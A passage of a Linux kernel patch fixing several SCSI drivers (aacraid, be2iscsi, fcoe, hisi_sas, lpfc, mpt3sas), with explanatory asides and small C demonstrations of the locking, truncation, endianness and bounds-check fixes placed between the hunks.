++	u8			use_map_queue;
+ };
+ 
+ #define aac_adapter_interrupt(dev) \
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index deb32c9f4b3e6..3f062e4013ab6 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -223,8 +223,12 @@ int aac_fib_setup(struct aac_dev * dev)
+ struct fib *aac_fib_alloc_tag(struct aac_dev *dev, struct scsi_cmnd *scmd)
+ {
+ 	struct fib *fibptr;
++	u32 blk_tag;
++	int i;
+ 
+-	fibptr = &dev->fibs[scsi_cmd_to_rq(scmd)->tag];
++	blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
++	i = blk_mq_unique_tag_to_tag(blk_tag);
++	fibptr = &dev->fibs[i];
+ 	/*
+ 	 *	Null out fields that depend on being zero at the start of
+ 	 *	each I/O
+diff --git a/drivers/scsi/aacraid/linit.c b/drivers/scsi/aacraid/linit.c
+index 5ba5c18b77b46..bff49b8ab057d 100644
+--- a/drivers/scsi/aacraid/linit.c
++++ b/drivers/scsi/aacraid/linit.c
+@@ -19,6 +19,7 @@
+ 
+ #include <linux/compat.h>
+ #include <linux/blkdev.h>
++#include <linux/blk-mq-pci.h>
+ #include <linux/completion.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -505,6 +506,15 @@ common_config:
+ 	return 0;
+ }
+ 
++static void aac_map_queues(struct Scsi_Host *shost)
++{
++	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
++
++	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
++			      aac->pdev, 0);
++	aac->use_map_queue = true;
++}
++
+ /**
+  *	aac_change_queue_depth		-	alter queue depths
+  *	@sdev:	SCSI device we are considering
+@@ -1489,6 +1499,7 @@ static struct scsi_host_template aac_driver_template = {
+ 	.bios_param			= aac_biosparm,
+ 	.shost_groups			= aac_host_groups,
+ 	.slave_configure		= aac_slave_configure,
++	.map_queues			= aac_map_queues,
+ 	.change_queue_depth		= aac_change_queue_depth,
+ 	.sdev_groups			= aac_dev_groups,
+ 	.eh_abort_handler		= aac_eh_abort,
+@@ -1776,6 +1787,8 @@ static int aac_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	shost->max_lun = AAC_MAX_LUN;
+ 
+ 	pci_set_drvdata(pdev, shost);
++	shost->nr_hw_queues = aac->max_msix;
++	shost->host_tagset = 1;
+ 
+ 	error = scsi_add_host(shost, &pdev->dev);
+ 	if (error)
+@@ -1908,6 +1921,7 @@ static void aac_remove_one(struct pci_dev *pdev)
+ 	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+ 
+ 	aac_cancel_rescan_worker(aac);
++	aac->use_map_queue = false;
+ 	scsi_remove_host(shost);
+ 
+ 	__aac_shutdown(aac);
+diff --git a/drivers/scsi/aacraid/src.c b/drivers/scsi/aacraid/src.c
+index 11ef58204e96f..61949f3741886 100644
+--- a/drivers/scsi/aacraid/src.c
++++ b/drivers/scsi/aacraid/src.c
+@@ -493,6 +493,10 @@ static int aac_src_deliver_message(struct fib *fib)
+ #endif
+ 
+ 	u16 vector_no;
++	struct scsi_cmnd *scmd;
++	u32 blk_tag;
++	struct Scsi_Host *shost = dev->scsi_host_ptr;
++	struct blk_mq_queue_map *qmap;
+ 
+ 	atomic_inc(&q->numpending);
+ 
+@@ -505,8 +509,25 @@ static int aac_src_deliver_message(struct fib *fib)
+ 		if ((dev->comm_interface == AAC_COMM_MESSAGE_TYPE3)
+ 			&& dev->sa_firmware)
+ 			vector_no = aac_get_vector(dev);
+-		else
+-			vector_no = fib->vector_no;
++		else {
++			if (!fib->vector_no || !fib->callback_data) {
++				if (shost && dev->use_map_queue) {
++					qmap = &shost->tag_set.map[HCTX_TYPE_DEFAULT];
++					vector_no = qmap->mq_map[raw_smp_processor_id()];
++				}
++				/*
++				 *	We hardcode the vector_no for
++				 *	reserved commands as a valid shost is
++				 *	absent during the init
++				 */
++				else
++					vector_no = 0;
++			} else {
++				scmd = (struct scsi_cmnd *)fib->callback_data;
++				blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
++				vector_no = blk_mq_unique_tag_to_hwq(blk_tag);
++			}
++		}
+ 
+ 		if (native_hba) {
+ 			if (fib->flags & FIB_CONTEXT_FLAG_NATIVE_HBA_TMF) {
+diff --git a/drivers/scsi/be2iscsi/be_iscsi.c b/drivers/scsi/be2iscsi/be_iscsi.c
+index 8aeaddc93b167..8d374ae863ba2 100644
+--- a/drivers/scsi/be2iscsi/be_iscsi.c
++++ b/drivers/scsi/be2iscsi/be_iscsi.c
+@@ -450,6 +450,10 @@ int beiscsi_iface_set_param(struct Scsi_Host *shost,
+ 	}
+ 
+ 	nla_for_each_attr(attrib, data, dt_len, rm_len) {
++		/* ignore nla_type as it is never used */
++		if (nla_len(attrib) < sizeof(*iface_param))
++			return -EINVAL;
++
+ 		iface_param = nla_data(attrib);
+ 
+ 		if (iface_param->param_type != ISCSI_NET_PARAM)
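
[Illustrative aside, not part of the patch] The be_iscsi.c hunk adds a check that each netlink attribute's payload is at least sizeof(*iface_param) before nla_data() is dereferenced, closing an out-of-bounds read on short attributes. The same rule applies to any TLV stream, sketched here with an illustrative struct:

#include <stdint.h>
#include <stdio.h>

struct iface_param {      /* illustrative stand-in */
    uint8_t param_type;
    uint8_t len;
    uint32_t value;
};

/* Accept the payload only if it really holds a complete struct. */
static const struct iface_param *attr_payload(const void *payload,
                                              size_t payload_len)
{
    if (payload_len < sizeof(struct iface_param))
        return NULL;      /* short attribute: reading it would overrun */
    return payload;
}

int main(void)
{
    struct iface_param good = { 0 };
    uint8_t short_attr[2] = { 0 };

    printf("short: %s\n",
           attr_payload(short_attr, sizeof(short_attr)) ? "ok" : "rejected");
    printf("good:  %s\n",
           attr_payload(&good, sizeof(good)) ? "ok" : "rejected");
    return 0;
}
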
+diff --git a/drivers/scsi/fcoe/fcoe_ctlr.c b/drivers/scsi/fcoe/fcoe_ctlr.c
+index ddc048069af25..8a4124e7d2043 100644
+--- a/drivers/scsi/fcoe/fcoe_ctlr.c
++++ b/drivers/scsi/fcoe/fcoe_ctlr.c
+@@ -319,16 +319,17 @@ static void fcoe_ctlr_announce(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *sel;
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 
+ 	kfree_skb(fip->flogi_req);
+ 	fip->flogi_req = NULL;
+ 	list_for_each_entry(fcf, &fip->fcfs, list)
+ 		fcf->flogi_sent = 0;
+ 
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 	sel = fip->sel_fcf;
+ 
+ 	if (sel && ether_addr_equal(sel->fcf_mac, fip->dest_addr))
+@@ -699,6 +700,7 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ {
+ 	struct fc_frame *fp;
+ 	struct fc_frame_header *fh;
++	unsigned long flags;
+ 	u16 old_xid;
+ 	u8 op;
+ 	u8 mac[ETH_ALEN];
+@@ -732,11 +734,11 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ 		op = FIP_DT_FLOGI;
+ 		if (fip->mode == FIP_MODE_VN2VN)
+ 			break;
+-		spin_lock_bh(&fip->ctlr_lock);
++		spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 		kfree_skb(fip->flogi_req);
+ 		fip->flogi_req = skb;
+ 		fip->flogi_req_send = 1;
+-		spin_unlock_bh(&fip->ctlr_lock);
++		spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 		schedule_work(&fip->timer_work);
+ 		return -EINPROGRESS;
+ 	case ELS_FDISC:
+@@ -1705,10 +1707,11 @@ static int fcoe_ctlr_flogi_send_locked(struct fcoe_ctlr *fip)
+ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 	int error;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 	LIBFCOE_FIP_DBG(fip, "re-sending FLOGI - reselect\n");
+ 	fcf = fcoe_ctlr_select(fip);
+ 	if (!fcf || fcf->flogi_sent) {
+@@ -1719,7 +1722,7 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ 		fcoe_ctlr_solicit(fip, NULL);
+ 		error = fcoe_ctlr_flogi_send_locked(fip);
+ 	}
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 	mutex_unlock(&fip->ctlr_mutex);
+ 	return error;
+ }
+@@ -1736,8 +1739,9 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 	fcf = fip->sel_fcf;
+ 	if (!fcf || !fip->flogi_req_send)
+ 		goto unlock;
+@@ -1764,7 +1768,7 @@ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ 	} else /* XXX */
+ 		LIBFCOE_FIP_DBG(fip, "No FCF selected - defer send\n");
+ unlock:
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ }
+ 
+ /**
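The fcoe_ctlr.c hunks convert every ctlr_lock site from the _bh variants to irqsave/irqrestore: spin_lock_bh() only masks softirqs, so if the same lock can also be taken from hard-interrupt context the old code could deadlock on one CPU. A compile-in-tree sketch of the pattern, with a stand-in lock (demo_lock is not part of the driver):

    #include <linux/spinlock.h>

    /* Minimal sketch, assuming state that an interrupt handler also
     * touches: irqsave disables local IRQs and remembers their prior
     * state, closing the window _bh leaves open. */
    static DEFINE_SPINLOCK(demo_lock);

    static void demo_touch_shared_state(void)
    {
            unsigned long flags;

            spin_lock_irqsave(&demo_lock, flags);   /* local IRQs off */
            /* ... update state shared with the IRQ handler ... */
            spin_unlock_irqrestore(&demo_lock, flags);
    }
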
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index 02575d81afca2..50697672146ad 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2026,6 +2026,11 @@ static void slot_err_v2_hw(struct hisi_hba *hisi_hba,
+ 	u16 dma_tx_err_type = le16_to_cpu(err_record->dma_tx_err_type);
+ 	u16 sipc_rx_err_type = le16_to_cpu(err_record->sipc_rx_err_type);
+ 	u32 dma_rx_err_type = le32_to_cpu(err_record->dma_rx_err_type);
++	struct hisi_sas_complete_v2_hdr *complete_queue =
++			hisi_hba->complete_hdr[slot->cmplt_queue];
++	struct hisi_sas_complete_v2_hdr *complete_hdr =
++			&complete_queue[slot->cmplt_queue_slot];
++	u32 dw0 = le32_to_cpu(complete_hdr->dw0);
+ 	int error = -1;
+ 
+ 	if (err_phase == 1) {
+@@ -2310,7 +2315,8 @@ static void slot_err_v2_hw(struct hisi_hba *hisi_hba,
+ 			break;
+ 		}
+ 		}
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 	}
+ 		break;
+ 	default:
+@@ -2443,7 +2449,8 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+ 	{
+ 		ts->stat = SAS_SAM_STAT_GOOD;
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	}
+ 	default:
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index e8a3511040af2..c0e74d768716d 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2163,6 +2163,7 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 	u32 trans_tx_fail_type = le32_to_cpu(record->trans_tx_fail_type);
+ 	u16 sipc_rx_err_type = le16_to_cpu(record->sipc_rx_err_type);
+ 	u32 dw3 = le32_to_cpu(complete_hdr->dw3);
++	u32 dw0 = le32_to_cpu(complete_hdr->dw0);
+ 
+ 	switch (task->task_proto) {
+ 	case SAS_PROTOCOL_SSP:
+@@ -2172,8 +2173,8 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 			 * but I/O information has been written to the host memory, we examine
+ 			 * response IU.
+ 			 */
+-			if (!(complete_hdr->dw0 & CMPLT_HDR_RSPNS_GOOD_MSK) &&
+-				(complete_hdr->dw0 & CMPLT_HDR_RSPNS_XFRD_MSK))
++			if (!(dw0 & CMPLT_HDR_RSPNS_GOOD_MSK) &&
++			    (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK))
+ 				return false;
+ 
+ 			ts->residual = trans_tx_fail_type;
+@@ -2189,7 +2190,7 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 	case SAS_PROTOCOL_SATA:
+ 	case SAS_PROTOCOL_STP:
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+-		if ((complete_hdr->dw0 & CMPLT_HDR_RSPNS_XFRD_MSK) &&
++		if ((dw0 & CMPLT_HDR_RSPNS_XFRD_MSK) &&
+ 		    (sipc_rx_err_type & RX_FIS_STATUS_ERR_MSK)) {
+ 			ts->stat = SAS_PROTO_RESPONSE;
+ 		} else if (dma_rx_err_type & RX_DATA_LEN_UNDERFLOW_MSK) {
+@@ -2202,7 +2203,8 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 			ts->stat = SAS_OPEN_REJECT;
+ 			ts->open_rej_reason = SAS_OREJ_RSVD_RETRY;
+ 		}
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	case SAS_PROTOCOL_SMP:
+ 		ts->stat = SAS_SAM_STAT_CHECK_CONDITION;
+@@ -2329,7 +2331,8 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 	case SAS_PROTOCOL_STP:
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+ 		ts->stat = SAS_SAM_STAT_GOOD;
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	default:
+ 		ts->stat = SAS_SAM_STAT_CHECK_CONDITION;
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 45a2fd6584d16..8b825364baade 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -535,7 +535,7 @@ EXPORT_SYMBOL(scsi_host_alloc);
+ static int __scsi_host_match(struct device *dev, const void *data)
+ {
+ 	struct Scsi_Host *p;
+-	const unsigned short *hostnum = data;
++	const unsigned int *hostnum = data;
+ 
+ 	p = class_to_shost(dev);
+ 	return p->host_no == *hostnum;
+@@ -552,7 +552,7 @@ static int __scsi_host_match(struct device *dev, const void *data)
+  *	that scsi_host_get() took. The put_device() below dropped
+  *	the reference from class_find_device().
+  **/
+-struct Scsi_Host *scsi_host_lookup(unsigned short hostnum)
++struct Scsi_Host *scsi_host_lookup(unsigned int hostnum)
+ {
+ 	struct device *cdev;
+ 	struct Scsi_Host *shost = NULL;
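struct Scsi_Host stores host_no as an unsigned int, so taking the lookup key as an unsigned short truncated host numbers above 65535 and could match the wrong host (or none). The truncation in a few lines of userspace C:

    /* Demonstrates the truncation the hosts.c hunk removes: pushing a
     * 32-bit host number through an unsigned short drops the high bits. */
    #include <stdio.h>

    int main(void)
    {
            unsigned int host_no = 65536;           /* plausible after many hotplug cycles */
            unsigned short truncated = host_no;     /* old parameter type */

            printf("%u -> %u\n", host_no, truncated);       /* 65536 -> 0 */
            return 0;
    }
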
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index 852b025e2fecf..b54fafb486e06 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -889,7 +889,7 @@ lpfc_bsg_ct_unsol_event(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
+ 			struct lpfc_iocbq *piocbq)
+ {
+ 	uint32_t evt_req_id = 0;
+-	uint32_t cmd;
++	u16 cmd;
+ 	struct lpfc_dmabuf *dmabuf = NULL;
+ 	struct lpfc_bsg_event *evt;
+ 	struct event_data *evt_dat = NULL;
+@@ -915,7 +915,7 @@ lpfc_bsg_ct_unsol_event(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
+ 
+ 	ct_req = (struct lpfc_sli_ct_request *)bdeBuf1->virt;
+ 	evt_req_id = ct_req->FsType;
+-	cmd = ct_req->CommandResponse.bits.CmdRsp;
++	cmd = be16_to_cpu(ct_req->CommandResponse.bits.CmdRsp);
+ 
+ 	spin_lock_irqsave(&phba->ct_ev_lock, flags);
+ 	list_for_each_entry(evt, &phba->ct_ev_waiters, node) {
+@@ -3186,8 +3186,8 @@ lpfc_bsg_diag_loopback_run(struct bsg_job *job)
+ 			ctreq->RevisionId.bits.InId = 0;
+ 			ctreq->FsType = SLI_CT_ELX_LOOPBACK;
+ 			ctreq->FsSubType = 0;
+-			ctreq->CommandResponse.bits.CmdRsp = ELX_LOOPBACK_DATA;
+-			ctreq->CommandResponse.bits.Size   = size;
++			ctreq->CommandResponse.bits.CmdRsp = cpu_to_be16(ELX_LOOPBACK_DATA);
++			ctreq->CommandResponse.bits.Size   = cpu_to_be16(size);
+ 			segment_offset = ELX_LOOPBACK_HEADER_SZ;
+ 		} else
+ 			segment_offset = 0;
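The CT command/response fields here are stored big-endian, so the hunks wrap them in be16_to_cpu()/cpu_to_be16(); on a little-endian host a raw assignment would store and compare byte-swapped values. A userspace sketch of the round trip, using htons()/ntohs() as stand-ins for cpu_to_be16()/be16_to_cpu() and an arbitrary command code:

    #include <arpa/inet.h>
    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
            uint16_t wire = htons(0x1234);  /* big-endian in memory */

            printf("in memory: 0x%04x, decoded: 0x%04x\n", wire, ntohs(wire));
            return 0;
    }
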
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 7a1563564df7f..7aac9fc719675 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -109,8 +109,6 @@ lpfc_sli4_set_rsp_sgl_last(struct lpfc_hba *phba,
+ 	}
+ }
+ 
+-#define LPFC_INVALID_REFTAG ((u32)-1)
+-
+ /**
+  * lpfc_rampdown_queue_depth - Post RAMP_DOWN_QUEUE event to worker thread
+  * @phba: The Hba for which this call is being executed.
+@@ -978,8 +976,6 @@ lpfc_bg_err_inject(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	sgpe = scsi_prot_sglist(sc);
+ 	lba = scsi_prot_ref_tag(sc);
+-	if (lba == LPFC_INVALID_REFTAG)
+-		return 0;
+ 
+ 	/* First check if we need to match the LBA */
+ 	if (phba->lpfc_injerr_lba != LPFC_INJERR_LBA_OFF) {
+@@ -1560,8 +1556,6 @@ lpfc_bg_setup_bpl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	/* extract some info from the scsi command for pde*/
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -1723,8 +1717,6 @@ lpfc_bg_setup_bpl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	/* extract some info from the scsi command */
+ 	blksize = scsi_prot_interval(sc);
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -1954,8 +1946,6 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	/* extract some info from the scsi command for pde*/
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -2155,8 +2145,6 @@ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	/* extract some info from the scsi command */
+ 	blksize = scsi_prot_interval(sc);
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -2748,8 +2736,6 @@ lpfc_calc_bg_err(struct lpfc_hba *phba, struct lpfc_io_buf *lpfc_cmd)
+ 
+ 		src = (struct scsi_dif_tuple *)sg_virt(sgpe);
+ 		start_ref_tag = scsi_prot_ref_tag(cmd);
+-		if (start_ref_tag == LPFC_INVALID_REFTAG)
+-			goto out;
+ 		start_app_tag = src->app_tag;
+ 		len = sgpe->length;
+ 		while (src && protsegcnt) {
+@@ -3495,11 +3481,11 @@ err:
+ 			     scsi_cmnd->sc_data_direction);
+ 
+ 	lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+-			"9084 Cannot setup S/G List for HBA"
+-			"IO segs %d/%d SGL %d SCSI %d: %d %d\n",
++			"9084 Cannot setup S/G List for HBA "
++			"IO segs %d/%d SGL %d SCSI %d: %d %d %d\n",
+ 			lpfc_cmd->seg_cnt, lpfc_cmd->prot_seg_cnt,
+ 			phba->cfg_total_seg_cnt, phba->cfg_sg_seg_cnt,
+-			prot_group_type, num_sge);
++			prot_group_type, num_sge, ret);
+ 
+ 	lpfc_cmd->seg_cnt = 0;
+ 	lpfc_cmd->prot_seg_cnt = 0;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 14ae0a9c5d3d8..2093888f154e0 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -139,6 +139,9 @@ _base_get_ioc_facts(struct MPT3SAS_ADAPTER *ioc);
+ static void
+ _base_clear_outstanding_commands(struct MPT3SAS_ADAPTER *ioc);
+ 
++static u32
++_base_readl_ext_retry(const volatile void __iomem *addr);
++
+ /**
+  * mpt3sas_base_check_cmd_timeout - Function
+  *		to check timeout and command termination due
+@@ -214,6 +217,20 @@ _base_readl_aero(const volatile void __iomem *addr)
+ 	return ret_val;
+ }
+ 
++static u32
++_base_readl_ext_retry(const volatile void __iomem *addr)
++{
++	u32 i, ret_val;
++
++	for (i = 0 ; i < 30 ; i++) {
++		ret_val = readl(addr);
++		if (ret_val == 0)
++			continue;
++	}
++
++	return ret_val;
++}
++
+ static inline u32
+ _base_readl(const volatile void __iomem *addr)
+ {
+@@ -941,7 +958,7 @@ mpt3sas_halt_firmware(struct MPT3SAS_ADAPTER *ioc)
+ 
+ 	dump_stack();
+ 
+-	doorbell = ioc->base_readl(&ioc->chip->Doorbell);
++	doorbell = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 	if ((doorbell & MPI2_IOC_STATE_MASK) == MPI2_IOC_STATE_FAULT) {
+ 		mpt3sas_print_fault_code(ioc, doorbell &
+ 		    MPI2_DOORBELL_DATA_MASK);
+@@ -6697,7 +6714,7 @@ mpt3sas_base_get_iocstate(struct MPT3SAS_ADAPTER *ioc, int cooked)
+ {
+ 	u32 s, sc;
+ 
+-	s = ioc->base_readl(&ioc->chip->Doorbell);
++	s = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 	sc = s & MPI2_IOC_STATE_MASK;
+ 	return cooked ? sc : s;
+ }
+@@ -6842,7 +6859,7 @@ _base_wait_for_doorbell_ack(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 					   __func__, count, timeout));
+ 			return 0;
+ 		} else if (int_status & MPI2_HIS_IOC2SYS_DB_STATUS) {
+-			doorbell = ioc->base_readl(&ioc->chip->Doorbell);
++			doorbell = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 			if ((doorbell & MPI2_IOC_STATE_MASK) ==
+ 			    MPI2_IOC_STATE_FAULT) {
+ 				mpt3sas_print_fault_code(ioc, doorbell);
+@@ -6882,7 +6899,7 @@ _base_wait_for_doorbell_not_used(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 	count = 0;
+ 	cntdn = 1000 * timeout;
+ 	do {
+-		doorbell_reg = ioc->base_readl(&ioc->chip->Doorbell);
++		doorbell_reg = ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 		if (!(doorbell_reg & MPI2_DOORBELL_USED)) {
+ 			dhsprintk(ioc,
+ 				  ioc_info(ioc, "%s: successful count(%d), timeout(%d)\n",
+@@ -7030,7 +7047,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 	__le32 *mfp;
+ 
+ 	/* make sure doorbell is not in use */
+-	if ((ioc->base_readl(&ioc->chip->Doorbell) & MPI2_DOORBELL_USED)) {
++	if ((ioc->base_readl_ext_retry(&ioc->chip->Doorbell) & MPI2_DOORBELL_USED)) {
+ 		ioc_err(ioc, "doorbell is in use (line=%d)\n", __LINE__);
+ 		return -EFAULT;
+ 	}
+@@ -7079,7 +7096,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 	}
+ 
+ 	/* read the first two 16-bits, it gives the total length of the reply */
+-	reply[0] = le16_to_cpu(ioc->base_readl(&ioc->chip->Doorbell)
++	reply[0] = le16_to_cpu(ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 	    & MPI2_DOORBELL_DATA_MASK);
+ 	writel(0, &ioc->chip->HostInterruptStatus);
+ 	if ((_base_wait_for_doorbell_int(ioc, 5))) {
+@@ -7087,7 +7104,7 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 			__LINE__);
+ 		return -EFAULT;
+ 	}
+-	reply[1] = le16_to_cpu(ioc->base_readl(&ioc->chip->Doorbell)
++	reply[1] = le16_to_cpu(ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 	    & MPI2_DOORBELL_DATA_MASK);
+ 	writel(0, &ioc->chip->HostInterruptStatus);
+ 
+@@ -7098,10 +7115,10 @@ _base_handshake_req_reply_wait(struct MPT3SAS_ADAPTER *ioc, int request_bytes,
+ 			return -EFAULT;
+ 		}
+ 		if (i >=  reply_bytes/2) /* overflow case */
+-			ioc->base_readl(&ioc->chip->Doorbell);
++			ioc->base_readl_ext_retry(&ioc->chip->Doorbell);
+ 		else
+ 			reply[i] = le16_to_cpu(
+-			    ioc->base_readl(&ioc->chip->Doorbell)
++			    ioc->base_readl_ext_retry(&ioc->chip->Doorbell)
+ 			    & MPI2_DOORBELL_DATA_MASK);
+ 		writel(0, &ioc->chip->HostInterruptStatus);
+ 	}
+@@ -7960,7 +7977,7 @@ _base_diag_reset(struct MPT3SAS_ADAPTER *ioc)
+ 			goto out;
+ 		}
+ 
+-		host_diagnostic = ioc->base_readl(&ioc->chip->HostDiagnostic);
++		host_diagnostic = ioc->base_readl_ext_retry(&ioc->chip->HostDiagnostic);
+ 		drsprintk(ioc,
+ 			  ioc_info(ioc, "wrote magic sequence: count(%d), host_diagnostic(0x%08x)\n",
+ 				   count, host_diagnostic));
+@@ -7980,7 +7997,7 @@ _base_diag_reset(struct MPT3SAS_ADAPTER *ioc)
+ 	for (count = 0; count < (300000000 /
+ 		MPI2_HARD_RESET_PCIE_SECOND_READ_DELAY_MICRO_SEC); count++) {
+ 
+-		host_diagnostic = ioc->base_readl(&ioc->chip->HostDiagnostic);
++		host_diagnostic = ioc->base_readl_ext_retry(&ioc->chip->HostDiagnostic);
+ 
+ 		if (host_diagnostic == 0xFFFFFFFF) {
+ 			ioc_info(ioc,
+@@ -8370,10 +8387,13 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->rdpq_array_enable_assigned = 0;
+ 	ioc->use_32bit_dma = false;
+ 	ioc->dma_mask = 64;
+-	if (ioc->is_aero_ioc)
++	if (ioc->is_aero_ioc) {
+ 		ioc->base_readl = &_base_readl_aero;
+-	else
++		ioc->base_readl_ext_retry = &_base_readl_ext_retry;
++	} else {
+ 		ioc->base_readl = &_base_readl;
